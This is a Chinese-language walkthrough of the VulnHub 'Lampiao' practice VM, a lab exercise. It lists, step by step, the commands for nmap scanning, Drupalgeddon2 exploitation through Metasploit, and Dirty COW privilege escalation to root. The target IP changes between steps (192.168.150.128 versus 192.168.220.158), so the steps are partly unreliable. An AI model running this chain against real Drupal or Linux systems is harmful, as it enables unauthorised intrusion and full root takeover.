复现环境:https://www.vulnhub.com/entry/lampiao-1,249/
解压Lampiao.zip导⼊虚拟机
步骤一:信息收集
1. 探测⽬标ip及开发端⼝ # nmap -p1-65535 192.168.150.0/24
2.发现192.168.150.128的同时该ip也开启了1898端口
步骤二:web漏洞利用
1.该⽹址是Drupal编写,所以我们进⼊msf进⾏查找是否有漏洞利⽤模块
找到 use exploit/unix/webapp/drupal_drupalgeddon2
2.进⾏漏洞利⽤
set rhost 192.168.220.158
set rport 1898
run
可以看到已经获取到主机权限
步骤三:内核提权
1.上传内核漏洞检测脚本 upload /root/linux-exploit-suggester.sh /tmp/1.sh
2.进⼊shell,并执⾏提权辅助脚本
shell
cd /tmp
chmod +x 1.sh
./1.sh
下面红框是漏洞利用程序
3.发现提权漏洞,上传提权利⽤程序dcow.cpp到服务器
exit upload /root/dcow.cpp /tmp/dcow.cpp
4. 进⾏提权操作
shell cd /tmp
5..编译漏洞利⽤程序成功后会在当前⽬录⽣成dcow
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
ls
6.由于本身的终端问题,所以使⽤python终端
python -c 'import pty; pty.spawn("/bin/bash")'
7.运行编译后的文件
./dcow
8.漏洞利⽤成功后使⽤root⽤户密码
dirtyCowFun
9.进⾏登录即可
su root